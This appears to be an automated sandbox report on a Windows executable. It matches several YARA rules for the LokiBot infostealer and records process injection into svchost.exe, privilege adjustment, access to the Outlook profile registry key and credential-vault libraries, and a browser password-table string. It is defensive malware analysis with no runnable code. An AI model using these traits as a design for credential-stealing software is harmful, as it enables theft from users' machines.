Source: 0.2.ZsRFRjkt9q.exe.930000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.ZsRFRjkt9q.exe.930000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.ZsRFRjkt9q.exe.930000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.ZsRFRjkt9q.exe.930000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: Process Memory Space: ZsRFRjkt9q.exe PID: 6336, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 6512, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/4@0/1

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_0044CE7A GetLastError,FormatMessageW,

0_2_0044CE7A

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0043AB84 AdjustTokenPrivileges,CloseHandle,	0_2_0043AB84
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0043B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_0043B134
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,	1_2_0040650A

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_0044E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0044E1FD

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_00446532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_00446532

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_0045C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_0045C18C

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_0040406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_0040406B

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00743360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

1_2_00743360

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00743360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

1_2_00743360

Source: C:\Windows\SysWOW64\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

File created: C:\Users\user\AppData\Local\Temp\aut5FB5.tmp

Jump to behavior

Source: ZsRFRjkt9q.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: svchost.exe, 00000001.00000003.1655869822.00000000027A5000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: ZsRFRjkt9q.exe

ReversingLabs: Detection: 82%

Source: unknown	Process created: C:\Users\user\Desktop\ZsRFRjkt9q.exe "C:\Users\user\Desktop\ZsRFRjkt9q.exe"
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ZsRFRjkt9q.exe"
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ZsRFRjkt9q.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: ZsRFRjkt9q.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ZsRFRjkt9q.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ZsRFRjkt9q.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ZsRFRjkt9q.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ZsRFRjkt9q.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ZsRFRjkt9q.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: ZsRFRjkt9q.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: N4Y.PDBPE source: ZsRFRjkt9q.exe, 00000000.00000003.1648267905.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp, ZsRFRjkt9q.exe, 00000000.00000003.1648143042.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp, ZsRFRjkt9q.exe, 00000000.00000003.1648143042.00000000009EF000.00000004.00000020.00020000.00000000.sdmp, epistemology.0.dr
Source:	Binary string: wntdll.pdbUGP source: ZsRFRjkt9q.exe, 00000000.00000003.1653676890.0000000003360000.00000004.00001000.00020000.00000000.sdmp, ZsRFRjkt9q.exe, 00000000.00000003.1654427687.0000000003500000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ZsRFRjkt9q.exe, 00000000.00000003.1653676890.0000000003360000.00000004.00001000.00020000.00000000.sdmp, ZsRFRjkt9q.exe, 00000000.00000003.1654427687.0000000003500000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000001.00000002.1705861891.0000000000741000.00000020.00000001.01000000.00000004.sdmp
Source:	Binary string: svchost.pdbUGP source: svchost.exe, 00000001.00000002.1705861891.0000000000741000.00000020.00000001.01000000.00000004.sdmp

Source: ZsRFRjkt9q.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ZsRFRjkt9q.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ZsRFRjkt9q.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ZsRFRjkt9q.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ZsRFRjkt9q.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.ZsRFRjkt9q.exe.930000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZsRFRjkt9q.exe.930000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1705736395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZsRFRjkt9q.exe PID: 6336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6512, type: MEMORYSTR

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_0041E01E LoadLibraryA,GetProcAddress,

0_2_0041E01E

Source: ZsRFRjkt9q.exe

Static PE information: real checksum: 0xfaa43 should be: 0xfa042

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0042C09E push esi; ret	0_2_0042C0A0
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0042C187 push edi; ret	0_2_0042C189
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0046C8BC push esi; ret	0_2_0046C8BE
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00426B05 push ecx; ret	0_2_00426B18
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0044B2B1 push FFFFFF8Bh; iretd	0_2_0044B2B3
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0042BDAA push edi; ret	0_2_0042BDAC
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0042BEC3 push esi; ret	0_2_0042BEC5
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00931EC0 push eax; ret	0_2_00931ED4
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00931EC0 push eax; ret	0_2_00931EFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402AC0 push eax; ret	1_2_00402AD4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402AC0 push eax; ret	1_2_00402AFC

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00743360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

1_2_00743360

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_00468111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00468111
Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Code function: 0_2_0041EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0041EB42

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe

Code function: 0_2_0042123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0042123A

Source: C:\Users\user\Desktop\ZsRFRjkt9q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
